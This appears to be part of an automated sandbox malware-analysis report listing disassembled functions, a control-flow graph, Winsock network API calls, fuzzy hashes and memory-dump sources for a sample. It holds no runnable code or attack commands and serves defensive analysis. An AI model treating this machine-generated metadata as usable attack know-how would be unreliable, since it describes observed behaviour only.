                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID: if_nametoindex$iphlpapi.dll
                                                          • API String ID: 724789610-3097795196
                                                          • Opcode ID: 86baf134445dad8c65a1f763b0f9e793badbc92ecdec42856746f7f465138f2c
                                                          • Instruction ID: 9d16ee94ad2a562c89f09eacde66e93c16a7205382a62069fa8ce9137a5737c8
                                                          • Opcode Fuzzy Hash: 86baf134445dad8c65a1f763b0f9e793badbc92ecdec42856746f7f465138f2c
                                                          • Instruction Fuzzy Hash: 8F017BD0D4438256EF02AB7EAD1736666901B53308F861A78E888961D3F769C988C293
                                                          Function 0049AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1804 49aa30-49aa64 1806 49aa6a-49aaa7 call 48e730 1804->1806 1807 49ab04-49ab09 1804->1807 1811 49aaa9-49aabd 1806->1811 1812 49ab0e-49ab13 1806->1812 1808 49ae80-49ae89 1807->1808 1813 49ab18-49ab50 1811->1813 1814 49aabf-49aac7 1811->1814 1815 49ae2e 1812->1815 1821 49ab58-49ab6d 1813->1821 1814->1815 1816 49aacd-49ab02 1814->1816 1817 49ae30-49ae4a call 48ea60 call 48ebf0 1815->1817 1816->1821 1831 49ae4c-49ae57 1817->1831 1832 49ae75-49ae7d 1817->1832 1823 49ab6f-49ab73 1821->1823 1824 49ab96-49abab socket 1821->1824 1823->1824 1827 49ab75-49ab8f 1823->1827 1824->1815 1826 49abb1-49abc5 1824->1826 1829 49abd0-49abed ioctlsocket 1826->1829 1830 49abc7-49abca 1826->1830 1827->1826 1845 49ab91 1827->1845 1836 49abef-49ac0a 1829->1836 1837 49ac10-49ac14 1829->1837 1830->1829 1835 49ad2e-49ad39 1830->1835 1833 49ae59-49ae5e 1831->1833 1834 49ae6e-49ae6f 1831->1834 1832->1808 1833->1834 1839 49ae60-49ae6c 1833->1839 1834->1832 1843 49ad3b-49ad4c 1835->1843 1844 49ad52-49ad56 1835->1844 1836->1837 1846 49ae29 1836->1846 1840 49ac37-49ac41 1837->1840 1841 49ac16-49ac31 1837->1841 1839->1832 1849 49ac7a-49ac7e 1840->1849 1850 49ac43-49ac46 1840->1850 1841->1840 1841->1846 1843->1844 1843->1846 1844->1846 1847 49ad5c-49ad6b 1844->1847 1845->1815 1846->1815 1855 49ad70-49ad78 1847->1855 1852 49ac80-49ac9b 1849->1852 1853 49ace7-49acfe 1849->1853 1857 49ac4c-49ac51 1850->1857 1858 49ad04-49ad08 1850->1858 1852->1853 1859 49ac9d-49acc1 1852->1859 1853->1858 1860 49ad7a-49ad7f 1855->1860 1861 49ada0-49adae connect 1855->1861 1857->1858 1863 49ac57-49ac78 1857->1863 1858->1835 1862 49ad0a-49ad28 1858->1862 1864 49acc6-49acd7 1859->1864 1860->1861 1865 49ad81-49ad99 1860->1865 1866 49adb3-49adcf 1861->1866 1862->1835 1862->1846 1863->1864 1864->1846 1872 49acdd-49ace5 1864->1872 1865->1866 1873 49ae8a-49ae91 1866->1873 1874 49add5-49add8 1866->1874 1872->1853 1872->1858 1873->1817 1875 49adda-49addf 1874->1875 1876 49ade1-49adf1 1874->1876 1875->1855 1875->1876 1877 49ae0d-49ae12 1876->1877 1878 49adf3-49ae07 1876->1878 1879 49ae1a-49ae1c call 49af70 1877->1879 1880 49ae14-49ae17 1877->1880 1878->1877 1883 49aea8-49aead 1878->1883 1884 49ae21-49ae23 1879->1884 1880->1879 1883->1817 1885 49ae93-49ae9d 1884->1885 1886 49ae25-49ae27 1884->1886 1887 49aeaf-49aeb1 call 48e760 1885->1887 1888 49ae9f-49aea6 call 48e7c0 1885->1888 1886->1817 1891 49aeb6-49aebe 1887->1891 1888->1891 1893 49af1a-49af1f 1891->1893 1894 49aec0-49aedb call 48e180 1891->1894 1893->1817 1894->1817 1897 49aee1-49aeec 1894->1897 1898 49aeee-49aeff 1897->1898 1899 49af02-49af06 1897->1899 1898->1899 1900 49af08-49af0b 1899->1900 1901 49af0e-49af15 1899->1901 1900->1901 1901->1808
                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0049AB9A
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0049ABE4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID:
                                                          • API String ID: 416004797-0
                                                          • Opcode ID: f6b756e53508874e49483d46864991f1c37ccdc66ce6790cb8dcc6d27d16fe89
                                                          • Instruction ID: f661d201fa2041b7e5e01dbfd0a44ccb3fa2a3154a588c38cff7a7823253a811
                                                          • Opcode Fuzzy Hash: f6b756e53508874e49483d46864991f1c37ccdc66ce6790cb8dcc6d27d16fe89
                                                          • Instruction Fuzzy Hash: A6E1B0706043029BEF20CF14C885B6B7BA5EF85304F144A3EF9988B391E779D954CB96
                                                          Function 003D78B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID: FD %s:%d sclose(%d)
                                                          • API String ID: 2781271927-3116021458
                                                          • Opcode ID: 4c7a34435757904e3e87e7f357fa9b1f4f43aae5e69d4ee1ebd7246224353323
                                                          • Instruction ID: fc4bbba3fc881059f699ae94004adcdce5defff1a526ce37c3c36679765c1978
                                                          • Opcode Fuzzy Hash: 4c7a34435757904e3e87e7f357fa9b1f4f43aae5e69d4ee1ebd7246224353323
                                                          • Instruction Fuzzy Hash: FED05E339092226B852169997D49C4BABA8EEC6F60F470C6AF9406B304E1209C0083E2
                                                          Function 0049B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0049B29E,?,00000000,?,?), ref: 0049B0BA
                                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00483C41,00000000), ref: 0049B0C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID:
                                                          • API String ID: 374722065-0
                                                          • Opcode ID: 436e9539e714c680c300f1594cad90be884d6a48816719d48bd84e97c6c3a21a
                                                          • Instruction ID: fa4b7f0dd59b9328ec5e6bad558d82f49312e0824f2b1f6bb077626bf691b735
                                                          • Opcode Fuzzy Hash: 436e9539e714c680c300f1594cad90be884d6a48816719d48bd84e97c6c3a21a
                                                          • Instruction Fuzzy Hash: 0C012D322042009FCE205A659D44E6BB795FF49764F040735F578532D0D72ADD104792
                                                          Function 00484950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • gethostname.WS2_32(00000000,00000040), ref: 00484AA5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: gethostname
                                                          • String ID:
                                                          • API String ID: 144339138-0
                                                          • Opcode ID: 823611e77350796d7f232a196b0de87f00ee8d24be588e905378da33675341da
                                                          • Instruction ID: 602b5d85aaef336455b5e997cf8b0de30a5e7806ad5c02cdcdb7c04ba41e65ab
                                                          • Opcode Fuzzy Hash: 823611e77350796d7f232a196b0de87f00ee8d24be588e905378da33675341da
                                                          • Instruction Fuzzy Hash: F351D1B06043028BE730AB65DD4972B76D4AF85319F040D3EE98A8B7D1E77CE844C70A
                                                          Function 0049AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0049AFD0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID:
                                                          • API String ID: 3358416759-0
                                                          • Opcode ID: 97521ee73d6ae5f960d416d1ef7371f7bc3377430ca05d9adbd30700cea46589
                                                          • Instruction ID: 27db81ccd80169b2f705076b9902dbe4af493d53d908b273735161ab7fb19732
                                                          • Opcode Fuzzy Hash: 97521ee73d6ae5f960d416d1ef7371f7bc3377430ca05d9adbd30700cea46589
                                                          • Instruction Fuzzy Hash: 4511967080878496EB268F1CD8027E6B7F4EFD0328F109619E59942550F7365AD68BC2
                                                          Function 0049A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0049A97E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: af8bfcefd09242e38988b06e5357dd312f3598aeeb6f331bb1cbb5a5684c4d41
                                                          • Instruction ID: b2fbf559b2816738e5bb35baf4afffb86380fe4f29511873f3a00fe856d0d30a
                                                          • Opcode Fuzzy Hash: af8bfcefd09242e38988b06e5357dd312f3598aeeb6f331bb1cbb5a5684c4d41
                                                          • Instruction Fuzzy Hash: 930167B17117109FC7148F15DC45B56BBA5FF84720F0A8569E9981B361C331AC159BD1
                                                          Function 0049AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(?,0049B280,00000000,-00000001,00000000,0049B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0049AF67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID:
                                                          • API String ID: 98920635-0
                                                          • Opcode ID: 691317ad737479a467c7f28cd8d4c302911ba59e1620a14775621617ef0e9e0a
                                                          • Instruction ID: d9b5b2092ec593f129667aa45f09b1b68783599bc02afb3feceaaeb493d37488
                                                          • Opcode Fuzzy Hash: 691317ad737479a467c7f28cd8d4c302911ba59e1620a14775621617ef0e9e0a
                                                          • Instruction Fuzzy Hash: 26E0E5B6A053256BD554DB18F8449ABF769EFC4B10F055A59B85457308C330AC548BE2
                                                          Function 0049B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • closesocket.WS2_32(?,00499422,?,?,?,?,?,?,?,?,?,?,?,w3H,00864C60,00000000), ref: 0049B04D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID:
                                                          • API String ID: 2781271927-0
                                                          • Opcode ID: b9ac983734a01becffd391b9fbd8799930b2c2b0b41d5fbb11d313f2266995ed
                                                          • Instruction ID: d06c6cc8a1888acac32d45407779710da853b992bb569c9ac69119eec76ec0f5
                                                          • Opcode Fuzzy Hash: b9ac983734a01becffd391b9fbd8799930b2c2b0b41d5fbb11d313f2266995ed
                                                          • Instruction Fuzzy Hash: CCD0123470020157CE249A14DAC4A577A6BBFD1710FA9CB78E42C4A665D73FDC47C681
                                                          Function 004367E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ioctlsocket.WS2_32(?,8004667E,?,?,0040AF56,?,00000001), ref: 004367FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocket
                                                          • String ID:
                                                          • API String ID: 3577187118-0
                                                          • Opcode ID: b25159a185e9837f3a33708988dd61ab8002254cec396c9374f8c808dce4d110
                                                          • Instruction ID: 5e253e6f4d17d3cce8d5f90fa08ae5605b364ea2c1047a18a1663653463cc68a
                                                          • Opcode Fuzzy Hash: b25159a185e9837f3a33708988dd61ab8002254cec396c9374f8c808dce4d110
                                                          • Instruction Fuzzy Hash: 3FC012F1119200AFC60C4724D955A2EB6D8DB44255F12591CB04692190EA349450CA1A
                                                          Function 003D31D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
